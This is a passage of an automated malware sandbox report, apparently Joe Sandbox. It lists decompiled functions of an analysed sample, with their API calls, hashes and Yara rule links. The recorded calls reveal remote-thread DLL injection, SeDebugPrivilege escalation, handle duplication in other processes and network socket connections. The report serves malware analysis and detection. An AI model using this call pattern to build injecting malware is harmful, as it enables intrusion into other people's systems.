                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 6A6DB369
                                                                                  • LocalFree.KERNEL32(00000000), ref: 6A6DB370
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6A6DB382
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 6A6DB38D
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6A6DB3A5
                                                                                  • _strncpy.LIBCMT ref: 6A6DB3C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CertNameString$Local$Alloc_printf$Free_strncpy
                                                                                  • String ID: %02x
                                                                                  • API String ID: 196360592-3293531392
                                                                                  • Opcode ID: 6b7791023d043c6b3d68f32c888b087d97cd2aea4433c9026033f522c5fb41f8
                                                                                  • Instruction ID: 56f356353c0d5e2f3fe35efc6f0c64127a0a4c6cd865561d27209fa99508376e
                                                                                  • Opcode Fuzzy Hash: 6b7791023d043c6b3d68f32c888b087d97cd2aea4433c9026033f522c5fb41f8
                                                                                  • Instruction Fuzzy Hash: 4241D671A01315BBD7109FA9CC85FAFBBF8EB49B54F114125FA04E7281DBB49D008AA4
                                                                                  Function 6A6E01F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89injectionmemorylibraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000002,00003000,00000004), ref: 6A6E0228
                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 6A6E0250
                                                                                  • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 6A6E0263
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E026A
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA), ref: 6A6E0286
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 6A6E028D
                                                                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6A6E02A2
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E02B3
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E02B6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$HandleMemory$CloseProcess$AllocateFreeInformationOpenQuerySystem$AddressAdjustAllocCreateModulePrivilegeProcRemoteThreadWrite
                                                                                  • String ID: LoadLibraryA$kernel32.dll
                                                                                  • API String ID: 3042910503-2572683754
                                                                                  • Opcode ID: bc314826b20b0fe335bd21a72090c2db6745bdff557517e6b1cc97605802fb38
                                                                                  • Instruction ID: c59c7ea55345cb1f036813b64a795693a37741954e52897170c29ce6e85ae662
                                                                                  • Opcode Fuzzy Hash: bc314826b20b0fe335bd21a72090c2db6745bdff557517e6b1cc97605802fb38
                                                                                  • Instruction Fuzzy Hash: AB21E7313852557FE61116E69C0AFAB37ECEF82B52F1A0074FE11DA180DE60AD054AA9
                                                                                  Function 6A6DDBA0 Relevance: 18.2, APIs: 12, Instructions: 168nativememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DDAF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,001F0FFF), ref: 6A6DDB0B
                                                                                  • ZwOpenProcess.NTDLL ref: 6A6DDC18
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004), ref: 6A6DDC3E
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,?,?,?), ref: 6A6DDC57
                                                                                  • ZwFreeVirtualMemory.NTDLL(000000FF,001FFFFF,001FFFFF,00008000), ref: 6A6DDC71
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004), ref: 6A6DDC9A
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,?,?,?), ref: 6A6DDCAD
                                                                                  • ZwDuplicateObject.NTDLL(001FFFFF,?,000000FF,?,00000000,00000000,00000002), ref: 6A6DDCE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtual$AllocateInformationQuerySystem$CreateDuplicateFreeObjectOpenProcessSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3499649989-0
                                                                                  • Opcode ID: 989422642f1a3788cca4d46365fc6468cf5fc8763ffeb3d05c1cdf4fb0a0cbde
                                                                                  • Instruction ID: 272973e0f65f06ca9e360e87f35e78bb4b7f3fe1780bd36c0f5f8628be7b2541
                                                                                  • Opcode Fuzzy Hash: 989422642f1a3788cca4d46365fc6468cf5fc8763ffeb3d05c1cdf4fb0a0cbde
                                                                                  • Instruction Fuzzy Hash: EB515DB1508304AFD700DF95C880D6BB7E9FBC9B58F544A2DF6A592290DB70E905CF62
                                                                                  Function 6A6E52C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 162COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E4A40: socket.WS2_32(00000002,00000001,00000000), ref: 6A6E4A65
                                                                                    • Part of subcall function 6A6E4A40: ioctlsocket.WS2_32 ref: 6A6E4A81
                                                                                    • Part of subcall function 6A6E4A40: htons.WS2_32(?), ref: 6A6E4AB1
                                                                                    • Part of subcall function 6A6E4A40: inet_addr.WS2_32(?), ref: 6A6E4AE5
                                                                                    • Part of subcall function 6A6E4A40: connect.WS2_32(?,?,00000010), ref: 6A6E4B00
                                                                                  • _memset.LIBCMT ref: 6A6E533D
                                                                                  • _memset.LIBCMT ref: 6A6E535A
                                                                                    • Part of subcall function 6A6E46C0: _memset.LIBCMT ref: 6A6E46F0
                                                                                    • Part of subcall function 6A6E46C0: _swscanf.LIBCMT ref: 6A6E4739
                                                                                  • closesocket.WS2_32(?), ref: 6A6E5404
                                                                                  • closesocket.WS2_32(?), ref: 6A6E5433
                                                                                    • Part of subcall function 6A6E4D60: _memset.LIBCMT ref: 6A6E4DB1
                                                                                    • Part of subcall function 6A6E4D60: select.WS2_32 ref: 6A6E4DED
                                                                                  • closesocket.WS2_32(?), ref: 6A6E5464
                                                                                  • closesocket.WS2_32(?), ref: 6A6E5493
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memsetclosesocket$_swscanfconnecthtonsinet_addrioctlsocketselectsocket
                                                                                  • String ID: P
                                                                                  • API String ID: 1656721356-3110715001
                                                                                  • Opcode ID: 54aca513506525698ac622a62b22ef08e5c0574b0e09300694200639f2704aff
                                                                                  • Instruction ID: 3a912d2db1bb36f3172fea4c26a1e9e839990d8dd89803e1ed5568cfb6419e22
                                                                                  • Opcode Fuzzy Hash: 54aca513506525698ac622a62b22ef08e5c0574b0e09300694200639f2704aff
                                                                                  • Instruction Fuzzy Hash: 8C51C3716093419FD720CF64D498ADBB7E4BF85309F45892DE489C7142EF71E50E8B91
                                                                                  Function 6A6FB28B Relevance: 12.1, APIs: 8, Instructions: 125filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6A6FB295
                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000104,00000000,?,00000158,6A6FB51A,?,00000000,?,00000000,00000104,00000000,00000000,?,?), ref: 6A6FB2D3
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  • PathIsUNCA.SHLWAPI(?,00000000,?,?,?), ref: 6A6FB343
                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 6A6FB36A
                                                                                  • CharUpperA.USER32(00000000), ref: 6A6FB39D
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 6A6FB3B9
                                                                                  • FindClose.KERNEL32(00000000), ref: 6A6FB3C5
                                                                                  • lstrlenA.KERNEL32(?), ref: 6A6FB3E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 624941980-0
                                                                                  • Opcode ID: 2e8c370219861b2d25818923ea1e3c0cd33affc25a419a8a055cd0bbbf884c3b
                                                                                  • Instruction ID: bbf59f378898b7b454193caf0ef9ec0506b9cfb6c5785e2e8424735ecd9b26b7
                                                                                  • Opcode Fuzzy Hash: 2e8c370219861b2d25818923ea1e3c0cd33affc25a419a8a055cd0bbbf884c3b
                                                                                  • Instruction Fuzzy Hash: 5241B171904619EFDF109FA0CC8CBEE77B9EF41319F0509A8E819A5292DF348E86CE10
                                                                                  Function 6A6D5FA0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 452COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D5FCF
                                                                                  • _memset.LIBCMT ref: 6A6D5FE3
                                                                                  • _memset.LIBCMT ref: 6A6D5FFD
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                    • Part of subcall function 6A6D5560: CoCreateInstance.OLE32(6A71AF30,00000000,00000001,6A71AF20,46D8D1FB), ref: 6A6D5586
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CreateInstanceLibraryLoad
                                                                                  • String ID: ...$.....$0.0
                                                                                  • API String ID: 1730192913-2035250324
                                                                                  • Opcode ID: a5379387f9af0408a04c3047bdde5537fe1508c1ef002fa0aa77daa5da428861
                                                                                  • Instruction ID: 75aabc861aaf38448c26e8ae71559d7ea78affd5e0cd7b3da1c689943d63b664
                                                                                  • Opcode Fuzzy Hash: a5379387f9af0408a04c3047bdde5537fe1508c1ef002fa0aa77daa5da428861
                                                                                  • Instruction Fuzzy Hash: 59E1897A61834057C72597B49C91BEBB3EA5FD824DF890C2DE418C62A2FF39E309C152
                                                                                  Function 6A6D8340 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32 ref: 6A6D8360
                                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6A6D8372
                                                                                  • ReadProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000000), ref: 6A6D838E
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 6A6D83A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadMemoryProcProcessRead
                                                                                  • String ID: ShowWindow$user32.dll
                                                                                  • API String ID: 4079270797-767597475
                                                                                  • Opcode ID: e93db6ec46dc4d123a1a5c7441f598a740e8b052b97293e07f1675d047923b99
                                                                                  • Instruction ID: 4a555dd7398575d25ab1fb63e41baf6db3fed2ebccfe8dae1c3370732cb40c61
                                                                                  • Opcode Fuzzy Hash: e93db6ec46dc4d123a1a5c7441f598a740e8b052b97293e07f1675d047923b99
                                                                                  • Instruction Fuzzy Hash: 1CF0A931609380ABDB10DBAACC48E5B7BF8AFC5651F09892DF558D3160DB34CD09CB66
                                                                                  Function 6A6E00F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?,6A6D11E6), ref: 6A6E00FE
                                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 6A6E0124
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6E0133
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 6A6E0151
                                                                                  • CloseHandle.KERNEL32(?), ref: 6A6E0160
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleToken$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 837837241-2896544425
                                                                                  • Opcode ID: 894f26c74353f8ca8276abda0351b0cc7fcd017deddcb3c209edaa37205a5273
                                                                                  • Instruction ID: 9c0058e49b9f178106e8cc35ce11e4ccede99a0283a7047e2a4d96d44308ace6
                                                                                  • Opcode Fuzzy Hash: 894f26c74353f8ca8276abda0351b0cc7fcd017deddcb3c209edaa37205a5273
                                                                                  • Instruction Fuzzy Hash: 7B0149743443016BE704DFA1CD4AF5B77E8BB84B01F85495CB545DA180EBB5DD04DB62
                                                                                  Function 0BE96E15 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BE93C00: GetKeyboardType.USER32(00000000), ref: 0BE93C05
                                                                                    • Part of subcall function 0BE93C00: GetKeyboardType.USER32(00000001), ref: 0BE93C11
                                                                                  • GetCommandLineA.KERNEL32 ref: 0BE96E7B
                                                                                  • GetVersion.KERNEL32 ref: 0BE96E8F
